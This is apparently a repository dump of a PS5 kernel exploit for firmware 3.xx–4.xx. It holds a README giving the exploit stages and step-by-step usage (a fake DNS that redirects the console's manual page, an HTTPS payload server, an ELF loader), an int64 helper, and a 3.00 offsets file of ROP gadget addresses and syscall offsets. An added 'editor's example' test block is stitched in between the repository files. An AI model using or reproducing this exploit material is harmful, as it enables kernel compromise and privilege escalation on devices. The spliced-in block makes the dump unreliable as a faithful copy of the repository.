├── .gitignore
├── README.md
├── dns.conf
├── document
│   └── en
│       └── ps5
│           ├── exploit.js
│           ├── index.html
│           ├── int64.js
│           ├── offsets
│           │   ├── 3.00.js
│           │   ├── 3.10.js
│           │   ├── 3.20.js
│           │   ├── 3.21.js
│           │   ├── 4.00.js
│           │   ├── 4.02.js
│           │   ├── 4.03.js
│           │   ├── 4.50.js
│           │   └── 4.51.js
│           ├── rop.js
│           ├── rop_slave.js
│           └── webkit.js
├── dumpserver.py
├── fakedns.py
├── host.py
├── klogclient.py
├── localhost.pem
├── logserver.py
├── rpcserver.py
└── sendelf.py
/.gitignore:
--------------------------------------------------------------------------------
1 | *.bin
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # PS5 3.xx / 4.xx Kernel Exploit
2 | ---
3 | ## Summary
4 | This repo contains an experimental WebKit ROP implementation of a PS5 kernel exploit based on **TheFlow's IPV6 Use-After-Free (UAF)**, which was [reported on HackerOne](https://hackerone.com/reports/1441103). The exploit strategy is for the most part based on TheFlow's BSD/PS4 PoC, with some changes to accommodate the annoying PS5 memory layout (see the *Research Notes* section for more). It establishes an arbitrary read / (semi-arbitrary) write primitive. This exploit and its capabilities have a lot of limitations, and as such it's mostly intended for developers to play with to reverse engineer some parts of the system.
5 |
6 | With the latest stability improvements, reliability is at about 80%. This document will contain research info about the PS5, and the exploit will undergo continued development and improvement as time goes on.
7 |
8 | Those interested in contributing to PS5 research/dev can join a Discord I have set up [here](https://discord.gg/kbrzGuH3F6).
9 |
10 | The exploit should now support the following firmwares:
11 |
12 | - 3.00
13 | - 3.10
14 | - 3.20
15 | - 3.21
16 | - 4.00
17 | - 4.02
18 | - 4.03
19 | - 4.50
20 | - 4.51
21 |
22 |
23 |
24 |
25 | ## Currently Included
26 |
27 | - Obtains arbitrary read/write and can run a basic RPC server for reads/writes (or a dump server for large reads); you must edit your own address/port into the exploit file on lines 673-677
28 | - Enables debug settings menu (note: you will have to fully exit settings and go back in to see it).
29 | - Gets root privileges
30 |
31 |
32 |
33 |
34 | ## Limitations
35 | - This exploit achieves read/write, **but not code execution**. This is because we cannot currently dump kernel code for gadgets, as kernel .text pages are marked as eXecute Only Memory (XOM). Attempting to read kernel .text pointers will panic!
36 | - As per the above + the hypervisor (HV) enforcing kernel write protection, this exploit also **cannot install any patches or hooks into kernel space**, which means no homebrew-related code for the time being.
37 | - Clang-based fine-grained Control Flow Integrity (CFI) is present and enforced.
38 | - Supervisor Mode Access Prevention/Execution (SMAP/SMEP) cannot be disabled, due to the HV.
39 | - The write primitive is somewhat constrained, as bytes 0x10-0x14 must be zero (or a valid network interface).
40 |   - However, thanks to newer work using pipes, full arbitrary read/write is now possible
41 |
42 |
43 |
44 |
45 | ## How to use
46 |
47 | 1. Configure fakedns via `dns.conf` to point `manuals.playstation.net` to your PC's IP address
48 | 2. Run the fake DNS: `python fakedns.py -c dns.conf`
49 | 3. Run the HTTPS server: `python host.py`
50 | 4. Go into the PS5 advanced network settings and set the primary DNS to your PC's IP address, leaving the secondary at `0.0.0.0`
51 |    - Sometimes the manual still won't load and a restart is needed; unsure why, it's really weird
52 | 5. Go to the user manual in settings, accept the untrusted certificate prompt, and the exploit runs
53 | 6. Optional: run the RPC/dump server scripts (note: address/port must be substituted in binary form into exploit.js).
54 |
55 |
56 |
57 | ## Future work
58 | - [x] ~~Fix-up sockets to exit browser cleanly (top prio)~~
59 | - [x] ~~Write some data patches (second prio)~~
60 | - [x] ~~Enable debug settings~~
61 | - [x] ~~Patch creds for uid0~~
62 | - [x] ~~Jailbreak w/ cr_prison overwrite~~
63 | - [x] ~~Improve UAF reliability~~
64 | - [x] ~~Improve victim socket reliability (third prio)~~
65 | - [x] ~~Use a better / more consistent leak target than kqueue~~ (no longer necessary)
66 | - [x] Make ELF loader support relocations
67 | - [ ] Add support for more relocations and possibly full dynamic linkage?
68 |
69 |
70 |
71 |
72 | ## Using ELF Loader
73 |
74 | To use the ELF loader, run the exploit until completion. Upon completion it runs a server on port `:9020`. Connect and send your ELF to the PS5 over that port and it will run it. Assuming the ELF doesn't crash the browser, the loader keeps accepting and running ELFs indefinitely.
75 |
76 |
77 |
78 | ## Exploit Stages
79 | This exploit works in 5 stages, and for the most part follows the same exploit strategy as TheFlow's PoC.
80 | 1) Trigger the initial UAF on `ip6_pktopts` and get two sockets to point to the same `pktopts` / overlap (master socket <-> overlap spray socket)
81 | 2) Free the `pktopts` on the master socket and fake it with an `ip6_rthdr` spray containing a tagged `tclass` overlap.
82 | 3) Infoleak step. Use the `pktopts`/`rthdr` overlap to leak a kqueue from the 0x200 slab and `pktopts` from the 0x100 slab.
83 | 4) Arbitrary read/write step. Fake `pktopts` again and find the overlap socket to use `IPV6_RTHDR` as a read/write primitive.
84 | 5) Cleanup + patch step. Increase the refcount on corrupted sockets for a successful browser exit, then patch data to enable the debug menu and patch ucreds for uid0.
85 | 6) Run the ELF loader server that accepts and loads/runs ELFs. Currently WIP; does not support relocations at the moment.
86 |
87 |
88 |
89 | ## Stability Notes
90 | Stability for this exploit is at about ~~30%~~ 80-90%, and it has two potential points of failure. In descending order of observed likelihood:
91 | 1) *Stage 1* fails to reclaim the UAF, causing an immediate crash or latent corruption that crashes later.
92 | 2) *Stage 4* fails to find a victim socket.
93 |
94 |
95 |
96 | ## Research Notes
97 | - ~~It appears based on various testing and dumping with the read primitive, that the PS5 has reverted back to 0x1000 page size compared to the PS4's 0x4000.~~
98 | - After further research, the page size is indeed still 0x4000; however, due to some insane allocator changes, different slabs can be allocated in the same virtual page.
99 |
100 | - It also seems that on the PS5 adjacent pages rarely belong to the same slab, as adjacent pages contain vastly different data. The memory layout seems more scattered.
101 | - Often when the PS5 panics (at least in a WebKit context), there will be awful audio output as the audio buffer gets corrupted in some way.
102 | - Sometimes this audio corruption persists to the next boot, unsure why.
103 | - Similar to PS4, the PS5 will require the power button to be manually pressed on the console twice to restart after a panic.
104 | - It is normal for the PS5 to take an absurd amount of time to reboot from a panic if it's isolated from the internet (unfortunately). Expect boot to take 3-4 minutes.
105 |
106 |
107 |
108 | ## Contributors / Special Thanks
109 | - [Andy Nguyen / theflow0](https://twitter.com/theflow0) - Vulnerability and exploit strategy
110 | - [ChendoChap](https://github.com/ChendoChap) - Various help with testing and research
111 | - [Znullptr](https://twitter.com/Znullptr) - Research/RE
112 | - [sleirsgoevy](https://twitter.com/sleirsgoevy) - Research/RE + exploit strat ideas
113 | - [bigboss](https://twitter.com/psxdev) - Research/RE
114 | - [flatz](https://twitter.com/flat_z) - Research/RE + help w/ patches
115 | - [zecoxao](https://twitter.com/notzecoxao) - Research/RE
116 | - [SocracticBliss](https://twitter.com/SocraticBliss) - Research/RE
117 | - laureeeeeee - Background low-level systems knowledge and assistance
118 |
119 |
120 |
121 | ## Thanks to testers
122 |
123 | - Dizz (4.50/4.51)
124 |
--------------------------------------------------------------------------------
/dns.conf:
--------------------------------------------------------------------------------
1 | A manuals.playstation.net 10.0.0.193
--------------------------------------------------------------------------------
/document/en/ps5/index.html:
--------------------------------------------------------------------------------
4 | PS5 Kernel Exploit (3.xx-4.xx)
--------------------------------------------------------------------------------
/document/en/ps5/int64.js:
--------------------------------------------------------------------------------
1 | function int64(low, hi) { // 64-bit value held as two unsigned 32-bit halves
2 | this.low = (low >>> 0);
3 | this.hi = (hi >>> 0);
4 |
5 | this.add32inplace = function (val) { // this += val (32-bit val), carrying into hi
6 | let new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
7 | let new_hi = (this.hi >>> 0);
8 |
9 | if (new_lo < this.low) {
10 | new_hi++;
11 | }
12 |
13 | this.hi = new_hi;
14 | this.low = new_lo;
15 | }
16 |
17 | this.add32 = function (val) { // returns this + val without modifying this
18 | let new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
19 | let new_hi = (this.hi >>> 0);
20 |
21 | if (new_lo < this.low) {
22 | new_hi++;
23 | }
24 |
25 | return new int64(new_lo, new_hi);
26 | }
27 |
28 | this.sub32 = function (val) { // returns this - val without modifying this
29 | let new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
30 | let new_hi = (this.hi >>> 0);
31 |
32 | if (new_lo > (this.low >>> 0)) { // borrow: the low word wrapped below zero
33 | new_hi--;
34 | }
35 |
36 | return new int64(new_lo, new_hi);
37 | }
38 |
39 | this.sub32inplace = function (val) { // this -= val, borrowing from hi
40 | let new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
41 | let new_hi = (this.hi >>> 0);
42 |
43 | if (new_lo > (this.low >>> 0)) { // borrow: the low word wrapped below zero
44 | new_hi--;
45 | }
46 |
47 | this.hi = new_hi;
48 | this.low = new_lo;
49 | }
50 |
51 | this.and32 = function (val) {
52 | let new_lo = this.low & val;
53 | let new_hi = this.hi;
54 | return new int64(new_lo, new_hi);
55 | }
56 |
57 | this.and64 = function (vallo, valhi) {
58 | let new_lo = this.low & vallo;
59 | let new_hi = this.hi & valhi;
60 | return new int64(new_lo, new_hi);
61 | }
62 |
63 | this.toString = function () { // hex string; low word zero-padded to 8 digits when hi is non-zero
64 | let lo_str = (this.low >>> 0).toString(16);
65 | let hi_str = (this.hi >>> 0).toString(16);
66 |
67 | if (this.hi == 0)
68 | return lo_str;
69 | else
70 | lo_str = zeroFill(lo_str, 8)
71 |
72 | return hi_str + lo_str;
73 | }
74 |
75 | return this;
76 | }
77 |
78 | function zeroFill(number, width) { // left-pad with '0' to the requested width
79 | width -= number.toString().length;
80 |
81 | if (width > 0) {
82 | return new Array(width + (/\./.test(number) ? 2 : 1)).join('0') + number;
83 | }
84 |
85 | return number + ""; // always return a string
86 | }
--------------------------------------------------------------------------------
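Added here as an editor's example, not code from the repository: a stand-alone check that exercises the int64 helper's carry and borrow paths against BigInt reference arithmetic, covering the boundary cases (low word landing exactly on 2^32, full 64-bit wrap, borrow into an all-ones high word) that the original `sub32` comparison obscures with its `> ... & 0xFFFFFFFF` precedence. The `int64` constructor inside is a compact copy of the one in int64.js with a fixed-width `toString`; `toBig` and `checkInt64Arithmetic` are new names introduced for this check.

```javascript
// Added example, not part of the repository: cross-check the int64 helper's
// add32/sub32 carry and borrow handling against BigInt reference arithmetic.
// int64 below is a compact copy of the constructor in int64.js (toString
// simplified to fixed-width hex) so this file runs stand-alone in Node.

function int64(low, hi) {
  this.low = low >>> 0;   // unsigned low 32 bits
  this.hi = hi >>> 0;     // unsigned high 32 bits

  // Add a 32-bit value; carry into the high word when the low word wraps.
  this.add32 = function (val) {
    const newLo = ((this.low + val) & 0xFFFFFFFF) >>> 0;
    let newHi = this.hi;
    if (newLo < this.low) newHi++;
    return new int64(newLo, newHi);   // constructor re-masks hi on a 64-bit wrap
  };

  // Subtract a 32-bit value; borrow from the high word when the low word wraps.
  this.sub32 = function (val) {
    const newLo = ((this.low - val) & 0xFFFFFFFF) >>> 0;
    let newHi = this.hi;
    if (newLo > this.low) newHi--;    // -1 >>> 0 becomes 0xFFFFFFFF in the constructor
    return new int64(newLo, newHi);
  };

  this.toString = function () {
    return this.hi.toString(16).padStart(8, "0") + this.low.toString(16).padStart(8, "0");
  };
  return this;
}

const MASK64 = (1n << 64n) - 1n;

// Reference conversion: int64 -> BigInt holding the exact unsigned 64-bit value.
function toBig(v) {
  return (BigInt(v.hi) << 32n) | BigInt(v.low);
}

// Run add32/sub32 over constructed boundary cases and return the list of
// mismatches against BigInt; an empty list means the limb arithmetic is sound.
function checkInt64Arithmetic() {
  const cases = [
    // [low, hi, val]  (constructed sample values)
    [0xFFFFFFFF, 0x00000000, 1],          // add carries into hi
    [0xFFFFFFFF, 0xFFFFFFFF, 1],          // add wraps the whole 64-bit value
    [0x00000000, 0x00000001, 1],          // sub borrows from hi
    [0x00000000, 0x00000000, 1],          // sub wraps to all ones
    [0x80000000, 0x00000001, 0x80000000], // low lands exactly on 2^32
    [0x12345678, 0x9ABCDEF0, 0x87654321], // mixed: sub borrows, add does not
  ];
  const failures = [];
  for (const [low, hi, val] of cases) {
    const v = new int64(low, hi);
    const expectAdd = (toBig(v) + BigInt(val)) & MASK64;
    const expectSub = (toBig(v) - BigInt(val)) & MASK64;
    if (toBig(v.add32(val)) !== expectAdd) failures.push(`add32 ${v} + ${val.toString(16)}`);
    if (toBig(v.sub32(val)) !== expectSub) failures.push(`sub32 ${v} - ${val.toString(16)}`);
  }
  return failures;
}

// Stand-alone run: prints PASS or the failing cases.
const failing = checkInt64Arithmetic();
console.log(failing.length === 0 ? "PASS" : failing.join("\n"));
```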
/document/en/ps5/offsets/3.00.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00314880;
2 | const OFFSET_wk_memset_import = 0x028DDEB8;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028DDB98;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x0002CED0;
7 | const OFFSET_lk_pthread_join = 0x0002F460;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x00014B50;
12 | const OFFSET_lc_setjmp = 0x0005F940;
13 | const OFFSET_lc_longjmp = 0x0005F990;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00107342,
20 | "pop rsi": 0x00115923,
21 | "pop rdx": 0x002FFDF2,
22 | "pop rcx": 0x0009AC92,
23 | "pop r8": 0x0024A59F,
24 | "pop r9" : 0x00277B41,
25 | "pop rax": 0x0002C827,
26 | "pop rsp": 0x00099A22,
27 |
28 | "mov [rdi], rsi": 0x00A2D5B8,
29 | "mov [rdi], rax": 0x0003A79A,
30 | "mov [rdi], eax": 0x0003A79B,
31 |
32 | "infloop": 0x00007351,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00E4EEDB,
36 | "sete al" : 0x00022549,
37 | "seta al" : 0x0000C94F,
38 | "setb al" : 0x0015E348,
39 | "setg al" : 0x002F89AA,
40 | "setl al" : 0x000E0D91,
41 | "shl rax, 3" : 0x01A26823,
42 | "add rax, rdx" : 0x016D53B2,
43 | "mov rax, [rax]" : 0x00047FEC,
44 | "inc dword [rax]": 0x004971AA,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x33B80, // sys_exit
49 | 0x002: 0x34B30, // sys_fork
50 | 0x003: 0x32D50, // sys_read
51 | 0x004: 0x32CB0, // sys_write
52 | 0x005: 0x33350, // sys_open
53 | 0x006: 0x33980, // sys_close
54 | 0x007: 0x32570, // sys_wait4
55 | 0x00A: 0x34670, // sys_unlink
56 | 0x00C: 0x34000, // sys_chdir
57 | 0x00F: 0x33A00, // sys_chmod
58 | 0x014: 0x32ED0, // sys_getpid
59 | 0x017: 0x329D0, // sys_setuid
60 | 0x018: 0x33FE0, // sys_getuid
61 | 0x019: 0x33390, // sys_geteuid
62 | 0x01B: 0x33430, // sys_recvmsg
63 | 0x01C: 0x33660, // sys_sendmsg
64 | 0x01D: 0x341B0, // sys_recvfrom
65 | 0x01E: 0x328D0, // sys_accept
66 | 0x01F: 0x326F0, // sys_getpeername
67 | 0x020: 0x34810, // sys_getsockname
68 | 0x021: 0x34330, // sys_access
69 | 0x022: 0x344B0, // sys_chflags
70 | 0x023: 0x33E80, // sys_fchflags
71 | 0x024: 0x34D60, // sys_sync
72 | 0x025: 0x33330, // sys_kill
73 | 0x027: 0x32DD0, // sys_getppid
74 | 0x029: 0x34390, // sys_dup
75 | 0x02A: 0x32D20, // sys_pipe
76 | 0x02B: 0x349D0, // sys_getegid
77 | 0x02C: 0x34D20, // sys_profil
78 | 0x02F: 0x32870, // sys_getgid
79 | 0x031: 0x32850, // sys_getlogin
80 | 0x032: 0x340E0, // sys_setlogin
81 | 0x035: 0x32A90, // sys_sigaltstack
82 | 0x036: 0x32BF0, // sys_ioctl
83 | 0x037: 0x33EC0, // sys_reboot
84 | 0x038: 0x33DC0, // sys_revoke
85 | 0x03B: 0x340C0, // sys_execve
86 | 0x041: 0x33A60, // sys_msync
87 | 0x049: 0x33250, // sys_munmap
88 | 0x04A: 0x33FC0, // sys_mprotect
89 | 0x04B: 0x33140, // sys_madvise
90 | 0x04E: 0x33310, // sys_mincore
91 | 0x04F: 0x327D0, // sys_getgroups
92 | 0x050: 0x32D70, // sys_setgroups
93 | 0x053: 0x327B0, // sys_setitimer
94 | 0x056: 0x325D0, // sys_getitimer
95 | 0x059: 0x33E20, // sys_getdtablesize
96 | 0x05A: 0x34230, // sys_dup2
97 | 0x05C: 0x33860, // sys_fcntl
98 | 0x05D: 0x333B0, // sys_select
99 | 0x05F: 0x32810, // sys_fsync
100 | 0x060: 0x33740, // sys_setpriority
101 | 0x061: 0x32F90, // sys_socket
102 | 0x062: 0x34020, // sys_connect
103 | 0x063: 0x34990, // sys_netcontrol
104 | 0x064: 0x32590, // sys_getpriority
105 | 0x065: 0x345B0, // sys_netabort
106 | 0x066: 0x34930, // sys_netgetsockinfo
107 | 0x068: 0x34630, // sys_bind
108 | 0x069: 0x338A0, // sys_setsockopt
109 | 0x06A: 0x32B90, // sys_listen
110 | 0x071: 0x33BA0, // sys_socketex
111 | 0x072: 0x33570, // sys_socketclose
112 | 0x074: 0x34D40, // sys_gettimeofday
113 | 0x075: 0x34E20, // sys_getrusage
114 | 0x076: 0x32550, // sys_getsockopt
115 | 0x078: 0x337E0, // sys_readv
116 | 0x079: 0x33640, // sys_writev
117 | 0x07A: 0x34290, // sys_settimeofday
118 | 0x07C: 0x331D0, // sys_fchmod
119 | 0x07D: 0x33A40, // sys_netgetiflist
120 | 0x07E: 0x34910, // sys_setreuid
121 | 0x07F: 0x33530, // sys_setregid
122 | 0x080: 0x34490, // sys_rename
123 | 0x083: 0x334B0, // sys_flock
124 | 0x085: 0x34D80, // sys_sendto
125 | 0x086: 0x34BB0, // sys_shutdown
126 | 0x087: 0x33F40, // sys_socketpair
127 | 0x088: 0x33CE0, // sys_mkdir
128 | 0x089: 0x32F30, // sys_rmdir
129 | 0x08A: 0x32440, // sys_utimes
130 | 0x08C: 0x348D0, // sys_adjtime
131 | 0x08D: 0x33A20, // sys_kqueueex
132 | 0x093: 0x33C80, // sys_setsid
133 | 0x0A5: 0x32770, // sys_sysarch
134 | 0x0B6: 0x34710, // sys_setegid
135 | 0x0B7: 0x325B0, // sys_seteuid
136 | 0x0BC: 0x34770, // sys_stat
137 | 0x0BD: 0x34B70, // sys_fstat
138 | 0x0BE: 0x33550, // sys_lstat
139 | 0x0BF: 0x32C50, // sys_pathconf
140 | 0x0C0: 0x33F00, // sys_fpathconf
141 | 0x0C2: 0x33490, // sys_getrlimit
142 | 0x0C3: 0x33070, // sys_setrlimit
143 | 0x0C4: 0x34690, // sys_getdirentries
144 | 0x0CA: 0x34470, // sys___sysctl
145 | 0x0CB: 0x33B20, // sys_mlock
146 | 0x0CC: 0x34510, // sys_munlock
147 | 0x0CE: 0x32FD0, // sys_futimes
148 | 0x0D1: 0x335B0, // sys_poll
149 | 0x0E8: 0x32670, // sys_clock_gettime
150 | 0x0E9: 0x33AE0, // sys_clock_settime
151 | 0x0EA: 0x34AE0, // sys_clock_getres
152 | 0x0EB: 0x346B0, // sys_ktimer_create
153 | 0x0EC: 0x32E30, // sys_ktimer_delete
154 | 0x0ED: 0x34B90, // sys_ktimer_settime
155 | 0x0EE: 0x34040, // sys_ktimer_gettime
156 | 0x0EF: 0x331F0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34570, // sys_nanosleep
158 | 0x0F1: 0x33DA0, // sys_ffclock_getcounter
159 | 0x0F2: 0x32D90, // sys_ffclock_setestimate
160 | 0x0F3: 0x33C20, // sys_ffclock_getestimate
161 | 0x0F7: 0x34610, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x341D0, // sys_issetugid
163 | 0x110: 0x34970, // sys_getdents
164 | 0x121: 0x34080, // sys_preadv
165 | 0x122: 0x335D0, // sys_pwritev
166 | 0x136: 0x332D0, // sys_getsid
167 | 0x13B: 0x34790, // sys_aio_suspend
168 | 0x144: 0x32E50, // sys_mlockall
169 | 0x145: 0x34250, // sys_munlockall
170 | 0x147: 0x32F50, // sys_sched_setparam
171 | 0x148: 0x33BC0, // sys_sched_getparam
172 | 0x149: 0x32710, // sys_sched_setscheduler
173 | 0x14A: 0x33590, // sys_sched_getscheduler
174 | 0x14B: 0x333F0, // sys_sched_yield
175 | 0x14C: 0x32990, // sys_sched_get_priority_max
176 | 0x14D: 0x32AB0, // sys_sched_get_priority_min
177 | 0x14E: 0x32CE0, // sys_sched_rr_get_interval
178 | 0x154: 0x324A0, // sys_sigprocmask
179 | 0x155: 0x324E0, // sys_sigsuspend
180 | 0x157: 0x343B0, // sys_sigpending
181 | 0x159: 0x344D0, // sys_sigtimedwait
182 | 0x15A: 0x34110, // sys_sigwaitinfo
183 | 0x16A: 0x346F0, // sys_kqueue
184 | 0x16B: 0x32950, // sys_kevent
185 | 0x17B: 0x328F0, // sys_mtypeprotect
186 | 0x188: 0x32A10, // sys_uuidgen
187 | 0x189: 0x34E60, // sys_sendfile
188 | 0x18D: 0x32EB0, // sys_fstatfs
189 | 0x190: 0x32A70, // sys_ksem_close
190 | 0x191: 0x33800, // sys_ksem_post
191 | 0x192: 0x340A0, // sys_ksem_wait
192 | 0x193: 0x34E40, // sys_ksem_trywait
193 | 0x194: 0x32BB0, // sys_ksem_init
194 | 0x195: 0x345D0, // sys_ksem_open
195 | 0x196: 0x342B0, // sys_ksem_unlink
196 | 0x197: 0x32A30, // sys_ksem_getvalue
197 | 0x198: 0x34270, // sys_ksem_destroy
198 | 0x1A0: 0x34750, // sys_sigaction
199 | 0x1A1: 0x343F0, // sys_sigreturn
200 | 0x1A5: 0x330D0, // sys_getcontext
201 | 0x1A6: 0x33E00, // sys_setcontext
202 | 0x1A7: 0x33F20, // sys_swapcontext
203 | 0x1AD: 0x33120, // sys_sigwait
204 | 0x1AE: 0x327F0, // sys_thr_create
205 | 0x1AF: 0x32B50, // sys_thr_exit
206 | 0x1B0: 0x334F0, // sys_thr_self
207 | 0x1B1: 0x32B70, // sys_thr_kill
208 | 0x1B9: 0x34190, // sys_ksem_timedwait
209 | 0x1BA: 0x324C0, // sys_thr_suspend
210 | 0x1BB: 0x32DF0, // sys_thr_wake
211 | 0x1BC: 0x33E60, // sys_kldunloadf
212 | 0x1C6: 0x34B50, // sys__umtx_op
213 | 0x1C7: 0x34890, // sys_thr_new
214 | 0x1C8: 0x347F0, // sys_sigqueue
215 | 0x1D0: 0x34150, // sys_thr_set_name
216 | 0x1D2: 0x33700, // sys_rtprio_thread
217 | 0x1DB: 0x32E90, // sys_pread
218 | 0x1DC: 0x33FA0, // sys_pwrite
219 | 0x1DD: 0x34870, // sys_mmap
220 | 0x1DE: 0x34370, // sys_lseek
221 | 0x1DF: 0x33410, // sys_truncate
222 | 0x1E0: 0x32E70, // sys_ftruncate
223 | 0x1E1: 0x32460, // sys_thr_kill2
224 | 0x1E2: 0x34DE0, // sys_shm_open
225 | 0x1E3: 0x34850, // sys_shm_unlink
226 | 0x1E6: 0x33090, // sys_cpuset_getid
227 | 0x1E7: 0x34C50, // sys_cpuset_getaffinity
228 | 0x1E8: 0x34410, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32830, // sys_openat
230 | 0x203: 0x33EE0, // sys___cap_rights_get
231 | 0x20A: 0x33920, // sys_pselect
232 | 0x214: 0x339E0, // sys_regmgr_call
233 | 0x215: 0x33760, // sys_jitshm_create
234 | 0x216: 0x33D40, // sys_jitshm_alias
235 | 0x217: 0x32C30, // sys_dl_get_list
236 | 0x218: 0x33A80, // sys_dl_get_info
237 | 0x21A: 0x339C0, // sys_evf_create
238 | 0x21B: 0x32E10, // sys_evf_delete
239 | 0x21C: 0x33D60, // sys_evf_open
240 | 0x21D: 0x33940, // sys_evf_close
241 | 0x21E: 0x33C00, // sys_evf_wait
242 | 0x21F: 0x343D0, // sys_evf_trywait
243 | 0x220: 0x33D80, // sys_evf_set
244 | 0x221: 0x342F0, // sys_evf_clear
245 | 0x222: 0x33100, // sys_evf_cancel
246 | 0x223: 0x33BE0, // sys_query_memory_protection
247 | 0x224: 0x334D0, // sys_batch_map
248 | 0x225: 0x336E0, // sys_osem_create
249 | 0x226: 0x326B0, // sys_osem_delete
250 | 0x227: 0x32630, // sys_osem_open
251 | 0x228: 0x34C30, // sys_osem_close
252 | 0x229: 0x33CC0, // sys_osem_wait
253 | 0x22A: 0x342D0, // sys_osem_trywait
254 | 0x22B: 0x33F60, // sys_osem_post
255 | 0x22C: 0x33840, // sys_osem_cancel
256 | 0x22D: 0x335F0, // sys_namedobj_create
257 | 0x22E: 0x332F0, // sys_namedobj_delete
258 | 0x22F: 0x34EC0, // sys_set_vm_container
259 | 0x230: 0x32DB0, // sys_debug_init
260 | 0x233: 0x33720, // sys_opmc_enable
261 | 0x234: 0x32790, // sys_opmc_disable
262 | 0x235: 0x337A0, // sys_opmc_set_ctl
263 | 0x236: 0x337C0, // sys_opmc_set_ctr
264 | 0x237: 0x34210, // sys_opmc_get_ctr
265 | 0x23C: 0x33030, // sys_virtual_query
266 | 0x249: 0x34650, // sys_is_in_sandbox
267 | 0x24A: 0x33210, // sys_dmem_container
268 | 0x24B: 0x33AC0, // sys_get_authinfo
269 | 0x24C: 0x32610, // sys_mname
270 | 0x24F: 0x32C10, // sys_dynlib_dlsym
271 | 0x250: 0x32F10, // sys_dynlib_get_list
272 | 0x251: 0x349B0, // sys_dynlib_get_info
273 | 0x252: 0x338C0, // sys_dynlib_load_prx
274 | 0x253: 0x328B0, // sys_dynlib_unload_prx
275 | 0x254: 0x34730, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x336C0, // sys_dynlib_get_proc_param
277 | 0x257: 0x34A10, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32480, // sys_sandbox_path
279 | 0x259: 0x32FF0, // sys_mdbg_service
280 | 0x25A: 0x33680, // sys_randomized_path
281 | 0x25B: 0x344F0, // sys_rdup
282 | 0x25C: 0x32AF0, // sys_dl_get_metadata
283 | 0x25D: 0x33230, // sys_workaround8849
284 | 0x25E: 0x329F0, // sys_is_development_mode
285 | 0x25F: 0x33B60, // sys_get_self_auth_info
286 | 0x260: 0x34E00, // sys_dynlib_get_info_ex
287 | 0x262: 0x34EA0, // sys_budget_get_ptype
288 | 0x263: 0x32D00, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x34C10, // sys_get_proc_type_info
290 | 0x265: 0x32420, // sys_get_resident_count
291 | 0x267: 0x33780, // sys_get_resident_fmem_count
292 | 0x268: 0x34830, // sys_thr_get_name
293 | 0x269: 0x33E40, // sys_set_gpo
294 | 0x26A: 0x33B40, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32930, // sys_test_debug_rwmem
296 | 0x26C: 0x32A50, // sys_free_stack
297 | 0x26E: 0x32650, // sys_ipmimgr_call
298 | 0x26F: 0x33AA0, // sys_get_gpo
299 | 0x270: 0x34E80, // sys_get_vm_map_timestamp
300 | 0x271: 0x34430, // sys_opmc_set_hw
301 | 0x272: 0x32F70, // sys_opmc_get_hw
302 | 0x273: 0x325F0, // sys_get_cpu_usage_all
303 | 0x274: 0x33C60, // sys_mmap_dmem
304 | 0x275: 0x33010, // sys_physhm_open
305 | 0x276: 0x33820, // sys_physhm_unlink
306 | 0x278: 0x34DC0, // sys_thr_suspend_ucontext
307 | 0x279: 0x332B0, // sys_thr_resume_ucontext
308 | 0x27A: 0x33270, // sys_thr_get_ucontext
309 | 0x27B: 0x33370, // sys_thr_set_ucontext
310 | 0x27C: 0x32FB0, // sys_set_timezone_info
311 | 0x27D: 0x33D00, // sys_set_phys_fmem_limit
312 | 0x27E: 0x330B0, // sys_utc_to_localtime
313 | 0x27F: 0x34EE0, // sys_localtime_to_utc
314 | 0x280: 0x34060, // sys_set_uevt
315 | 0x281: 0x32BD0, // sys_get_cpu_usage_proc
316 | 0x282: 0x33450, // sys_get_map_statistics
317 | 0x283: 0x341F0, // sys_set_chicken_switches
318 | 0x286: 0x34B10, // sys_get_kernel_mem_statistics
319 | 0x287: 0x33D20, // sys_get_sdk_compiled_version
320 | 0x288: 0x32690, // sys_app_state_change
321 | 0x289: 0x348B0, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32730, // sys_process_terminate
323 | 0x28D: 0x32EF0, // sys_blockpool_open
324 | 0x28E: 0x32C90, // sys_blockpool_map
325 | 0x28F: 0x346D0, // sys_blockpool_unmap
326 | 0x290: 0x34310, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x333D0, // sys_blockpool_batch
328 | 0x292: 0x32B30, // sys_fdatasync
329 | 0x293: 0x33050, // sys_dynlib_get_list2
330 | 0x294: 0x34DA0, // sys_dynlib_get_info2
331 | 0x295: 0x34550, // sys_aio_submit
332 | 0x296: 0x32AD0, // sys_aio_multi_delete
333 | 0x297: 0x33900, // sys_aio_multi_wait
334 | 0x298: 0x329B0, // sys_aio_multi_poll
335 | 0x299: 0x34450, // sys_aio_get_data
336 | 0x29A: 0x338E0, // sys_aio_multi_cancel
337 | 0x29B: 0x32890, // sys_get_bio_usage_all
338 | 0x29C: 0x33F80, // sys_aio_create
339 | 0x29D: 0x349F0, // sys_aio_submit_cmd
340 | 0x29E: 0x348F0, // sys_aio_init
341 | 0x29F: 0x34350, // sys_get_page_table_stats
342 | 0x2A0: 0x347B0, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x34950, // sys_blockpool_move
344 | 0x2A2: 0x347D0, // sys_virtual_query_all
